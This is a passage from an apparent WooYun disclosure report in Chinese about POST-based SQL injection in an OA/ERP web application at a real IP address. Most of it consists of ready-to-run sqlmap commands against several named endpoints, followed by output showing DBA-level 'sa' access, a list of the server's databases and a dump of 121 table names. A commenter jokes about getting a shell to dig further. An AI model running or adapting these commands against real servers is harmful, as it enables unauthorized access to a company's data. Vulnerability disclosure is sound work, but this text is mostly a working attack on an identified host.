sqlmap.py -u "http://112.124.41.23:38888/Sell/Contract.aspx"--dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAICZBYCZg9kFgYCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMmRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUWQ29udHJhY3RWaWV3LmFzcHg%2FSUQ9MmQWAmYPFQEY5buj5bee6LuK6KGMMSAyMDEzLjExLjE0ZAICDw8WAh8FBQcyMDEzMDAxZGQCAw8PFgIfBQUG6Yq35ZSuZGQCBA8PFgIfBQUH6LuK6KGMMWRkAgUPDxYCHwUFA2FhYWRkAgYPDxYCHwUFEzIwMTMtMTEtMTQgMTU6MjU6MTlkZAIHDw8WAh8FBQzpgJrov4flrqHmoLhkZAICDw9kFgQfAwVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfBAUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWEGYPZBYCAgEPDxYCHwUFATFkZAIBD2QWAgIBDw8WAh8GBRZDb250cmFjdFZpZXcuYXNweD9JRD0xZBYCZg8VAQbph4fotK1kAgIPDxYCHwUFBzIwMTIwMDFkZAIDDw8WAh8FBQbph4fotK1kZAIEDw8WAh8FBRLljJfkuqzkuK3llYbljLvoja9kZAIFDw8WAh8FBQNhYWFkZAIGDw8WAh8FBRMyMDEyLTEwLTI1IDE0OjUyOjEzZGQCBw8PFgIfBQUM6YCa6L%2BH5a6h5qC4ZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkuAqEbS7Zc03UpA1ESiQ3gUmJJEo%3D&TextBox1=ads&ImageButton4.x=20&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKk6arfBgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CcF0Fd6sfdJtgBZojxMdO5NePpgI" -p TextBox1
TextBox1存在POST注入


150617_41.png


注入十九、

sqlmap.py -u "http://112.124.41.23:38888/Car/CarLog.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTQ5OTIxMTYwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCwUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjYFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ9nZMsv76oU%2BcnIVl9sEL5HPn%2BdLzGG&DropDownList2=CarName&TextBox3=asd&ImageButton4.x=20&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEwKMj7HHAgLf5572CwLnqr7bDwKayI7FDwLgk7KqAwLs0Yq1BQLSwv2aBALSwqXRBQLSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CTFkpjF2elTwIxiQuU%2BQCx%2FJ9NMz" -p TextBox3 --dbms="mssql"
TextBox3存在POST注入


150617_42.png


注入二十、

sqlmap.py -u "http://112.124.41.23:38888/DocFile/DangAn.aspx" --data "__VIEWSTATE=%2FwEPDwULLTExMDg2MDE4MzgPZBYCZg9kFggCAQ8PFgIeBFRleHRlZGQCDg88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGA8PFgIfAAUBMWRkAhoPDxYCHwAFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RZGyacswZw0WUqdtMoHBbw71m9hg%3D%3D&TextBox1=abc&ImageButton4.x=23&ImageButton4.y=10&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLNrKeTAQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbOjWL4mdYarCP4ShF8FGyvhczRv" -p TextBox1 --dbms="mssql"
TextBox1存在POST注入


150617_43.png


好累
=======================================================================
数据证明

sqlmap.py -u "http://112.124.41.23:38888/DocFile/DangAn.aspx" --data "__VIEWSTATE=%2FwEPDwULLTExMDg2MDE4MzgPZBYCZg9kFggCAQ8PFgIeBFRleHRlZGQCDg88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGA8PFgIfAAUBMWRkAhoPDxYCHwAFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RZGyacswZw0WUqdtMoHBbw71m9hg%3D%3D&TextBox1=abc&ImageButton4.x=23&ImageButton4.y=10&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLNrKeTAQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbOjWL4mdYarCP4ShF8FGyvhczRv" -p TextBox1 --dbms="mssql" --current-db --current-user --is-dba --dbs


data.png


数据库:

current user:    'sa'
[17:38:23] [INFO] fetching current database
current database:    'FGOA'
[17:38:23] [INFO] testing if current user is DBA
current user is DBA:    True
[17:38:24] [INFO] fetching database names
available databases [11]:
[*] FG360
[*] FGOA
[*] FGOA_T1
[*] JWOA
[*] JYOA
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


数据表:

Database: FGOA
[121 tables]
+-------------------------+
| dbo.ERPAnPai            |
| dbo.ERPBBSBanKuai       |
| dbo.ERPBBSTieZi         |
| dbo.ERPBaoJia           |
| dbo.ERPBaoXiao          |
| dbo.ERPBook             |
| dbo.ERPBookJieHuan      |
| dbo.ERPBuMen            |
| dbo.ERPBuyChanPin       |
| dbo.ERPBuyOrder         |
| dbo.ERPCYDIC            |
| dbo.ERPCarBaoXian       |
| dbo.ERPCarBaoYang       |
| dbo.ERPCarInfo          |
| dbo.ERPCarJiaYou        |
| dbo.ERPCarLog           |
| dbo.ERPCarShiYong       |
| dbo.ERPCarWeiHu         |
| dbo.ERPCarWeiZhang      |
| dbo.ERPContract         |
| dbo.ERPContractChanPin  |
| dbo.ERPCrmSetting       |
| dbo.ERPCustomFuWu       |
| dbo.ERPCustomHuiFang    |
| dbo.ERPCustomInfo       |
| dbo.ERPCustomNeed       |
| dbo.ERPDanWeiInfo       |
| dbo.ERPDangAn           |
| dbo.ERPFileList         |
| dbo.ERPGongGao          |
| dbo.ERPGuDing           |
| dbo.ERPGuDingJiLu       |
| dbo.ERPHuiBao           |
| dbo.ERPHuiYuan          |
| dbo.ERPJSDIC            |
| dbo.ERPJXDetails        |
| dbo.ERPJiXiao           |
| dbo.ERPJiXiaoCanShu     |
| dbo.ERPJianLi           |
| dbo.ERPJiangCheng       |
| dbo.ERPJiangChengZhiDu  |
| dbo.ERPJiaoSe           |
| dbo.ERPJinDu            |
| dbo.ERPJuanKu           |
| dbo.ERPKaoQin           |
| dbo.ERPKaoQinSetting    |
| dbo.ERPLanEmail         |
| dbo.ERPLiRun            |
| dbo.ERPLinkLog          |
| dbo.ERPLinkMan          |
| dbo.ERPMeeting          |
| dbo.ERPMianShi          |
| dbo.ERPMobile           |
| dbo.ERPNForm            |
| dbo.ERPNFormType        |
| dbo.ERPNWorkDetails     |
| dbo.ERPNWorkFlow        |
| dbo.ERPNWorkFlowBQ      |
| dbo.ERPNWorkFlowNode    |
| dbo.ERPNWorkFlowWT      |
| dbo.ERPNWorkToDo        |
| dbo.ERPNetEmail         |
| dbo.ERPOffice           |
| dbo.ERPPeiXun           |
| dbo.ERPPeiXunRiJi       |
| dbo.ERPPeiXunXiaoGuo    |
| dbo.ERPPinShen          |
| dbo.ERPProduct          |
| dbo.ERPProject          |
| dbo.ERPRedHead          |
| dbo.ERPRenShiHeTong     |
| dbo.ERPReport           |
| dbo.ERPReportType       |
| dbo.ERPRiZhi            |
| dbo.ERPSaveFileName     |
| dbo.ERPSerils           |
| dbo.ERPSheBei           |
| dbo.ERPShenPi           |
| dbo.ERPShiShi           |
| dbo.ERPShouKuan         |
| dbo.ERPSongYang         |
| dbo.ERPSupplyLink       |
| dbo.ERPSupplys          |
| dbo.ERPSystemSetting    |
| dbo.ERPTalkInfo         |
| dbo.ERPTalkOnlineUser   |
| dbo.ERPTalkSetting      |
| dbo.ERPTaskFP           |
| dbo.ERPTelFile          |
| dbo.ERPTiKu             |
| dbo.ERPTiKuKaoShi       |
| dbo.ERPTiKuKaoShiJieGuo |
| dbo.ERPTiKuShiJuan      |
| dbo.ERPTiKuShiJuanSet   |
| dbo.ERPTiKuShiJuanType  |
| dbo.ERPTiKuType         |
| dbo.ERPTongXunLu        |
| dbo.ERPTouSu            |
| dbo.ERPTreeList         |
| dbo.ERPUser             |
| dbo.ERPUserDesk         |
| dbo.ERPVote             |
| dbo.ERPWorkPlan         |
| dbo.ERPWorkRiZhi        |
| dbo.ERPXCDetails        |
| dbo.ERPXinChou          |
| dbo.ERPXinChouCanShu    |
| dbo.ERPXueXi            |
| dbo.ERPXueXiXinDe       |
| dbo.ERPYinZhang         |
| dbo.ERPYinZhangLog      |
| dbo.FGOA_Fxzl           |
| dbo.FGOA_FxzlHit        |
| dbo.FGOA_FxzlType       |
| dbo.FGOA_NetDisk        |
| dbo.FGOA_PlugIn         |
| dbo.View_1              |
| dbo.dtproperties        |
| dbo.fgoa_mobile_msg     |
| dbo.sysconstraints      |
| dbo.syssegments         |
+-------------------------+


main1.png

漏洞证明:

上面已证明

修复方案:

过滤+升级程序然后补丁

版权声明:转载请注明来源 goubuli@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-23 08:45

厂商回复:

cnvd确认并复现所述情况,已由cnvd通过公开联系渠道向软件生产厂商通报,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-18 10:46 | change ( 实习白帽子 | Rank:60 漏洞数:15 | 核心白帽子)

    挖干净了////

  2. 2015-06-18 10:50 | goubuli ( 普通白帽子 | Rank:324 漏洞数:61 )

    @change 拿个shell进去慢慢翻,估计还会有( ̄▽ ̄)

  3. 2015-06-18 10:53 | %230CC ( 路人 | Rank:6 漏洞数:2 | 溜溜)

    某OA 是啥偶诶

  4. 2015-09-21 08:55 | 心云 ( 路人 | Rank:6 漏洞数:4 | 学好技术,读好书,做好人。)

    想问是怎么挖到这么多post注入的。。。。